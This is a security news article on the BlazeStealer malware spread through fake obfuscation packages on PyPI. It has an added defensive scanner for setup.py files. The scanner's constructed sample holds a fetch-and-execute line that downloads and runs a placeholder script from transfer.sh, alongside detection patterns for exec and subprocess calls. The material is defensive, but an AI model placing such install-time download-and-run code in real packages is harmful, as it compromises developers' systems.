The BlazeStealer malware has plagued Python packages

February 23, 2024

The BlazeStealer malware has spread in the PyPI repository to infect and compromise developers.

Based on reports, the malicious threat has made its way into the Python Package Index (PyPI) repository, targeting those who seek seemingly harmless obfuscation tools. Researchers recently discovered this malware. They explained that BlazeStealer could allow hackers to gain complete control over compromised developer systems.

The campaign first appeared earlier this year and involves eight deceptive packages, namely Pyobftoexe, Pyobfusfile, Pyobfexecute, Pyobfpremium, Pyobflite, Pyobfadvance, Pyobfuse, and pyobfgood – the last of which was published in October.

These packages include setup.py and __init__.py files that retrieve a Python script hosted on transfer[.]sh and execute it immediately upon installation.
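The install-time fetch-and-execute behaviour described above is something a reviewer can look for statically before installing a package. The following is an added example, not code from the article or from the packages it describes: it walks the AST of a setup.py file and reports network fetches, dynamic execution and references to the transfer.sh hosting service; the two setup.py samples are constructed, and the URL in the first is a placeholder.

```python
import ast
# Call targets and modules whose presence in install-time code merits review.
FETCH_CALLS = {"urlopen", "urlretrieve", "urllib.request.urlopen", "requests.get"}
EXEC_CALLS = {"exec", "eval", "os.system", "subprocess.run", "subprocess.Popen",
              "subprocess.call", "subprocess.check_output", "Popen"}
NETWORK_MODULES = {"urllib", "requests", "http", "socket"}

def _dotted(node):
    """Render a Name/Attribute chain such as urllib.request.urlopen as a string."""
    if isinstance(node, ast.Name):
        return node.id
    if isinstance(node, ast.Attribute):
        base = _dotted(node.value)
        return f"{base}.{node.attr}" if base else None
    return None

def audit_setup_py(source):
    """Statically scan setup.py text; return a sorted list of review findings."""
    findings = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, (ast.Import, ast.ImportFrom)):
            modules = ([a.name for a in node.names] if isinstance(node, ast.Import)
                       else [node.module or ""])
            for mod in modules:
                if mod.split(".")[0] in NETWORK_MODULES:
                    findings.add(f"network module imported: {mod}")
        elif isinstance(node, ast.Call):
            name = _dotted(node.func)
            if name in FETCH_CALLS:
                findings.add(f"network fetch at install time: {name}()")
            elif name in EXEC_CALLS:
                findings.add(f"dynamic execution at install time: {name}()")
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            if "transfer.sh" in node.value:  # hosting service named in the article
                findings.add("reference to transfer.sh")
    return sorted(findings)

# Constructed samples (not real package code); the first mirrors the article's pattern.
SAMPLE_SETUP_PY = '''
from setuptools import setup
from urllib.request import urlopen
exec(urlopen("https://transfer.sh/PLACEHOLDER/stage2.py").read())
setup(name="pyobfexample", version="0.0.1")
'''
BENIGN_SETUP_PY = '''
from setuptools import setup, find_packages
import os
setup(name="example", version=os.environ.get("PKG_VERSION", "0.0.1"), packages=find_packages())
'''
```

Run `audit_setup_py` over a downloaded sdist's setup.py before installing; the benign sample yields no findings, while the constructed malicious one yields four.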

After infecting a target, the BlazeStealer malware operates as a bot that its operators use to access data.

According to investigations, the BlazeStealer malware operates as a Discord bot that could enable its operators to access sensitive information.

It can harvest passwords from web browsers, capture screenshots, execute arbitrary commands, encrypt files, and even deactivate Microsoft Defender Antivirus on the victim’s computer.

Furthermore, it can disrupt a device by increasing CPU usage, inserting a Windows Batch script in the startup directory to shut down the machine, and even triggering a dreaded blue screen of death (BSoD) error.

Separate research also emphasised that developers engaged in code obfuscation often handle valuable and sensitive information, making them an attractive target for hackers. The packages were downloaded 2,438 times before researchers observed them and they were removed from PyPI, with the most downloads coming from the U.S., followed by China, Russia, Ireland, Hong Kong, Croatia, France, and Spain.

Experts explained the importance of vigilance in the open-source domain. Hence, developers should scrutinise every package before downloading it. This discovery aligns with a broader trend in recent years where open-source repositories have become lucrative platforms for threat actors to distribute malware.

Therefore, every developer should improve their awareness and security measures in the software supply chain. Regardless of their speciality, these developers must remain cautious and proactive to safeguard their valuable information from emerging threats like BlazeStealer since threat actors will likely continue supplying them with malware-laden packages.
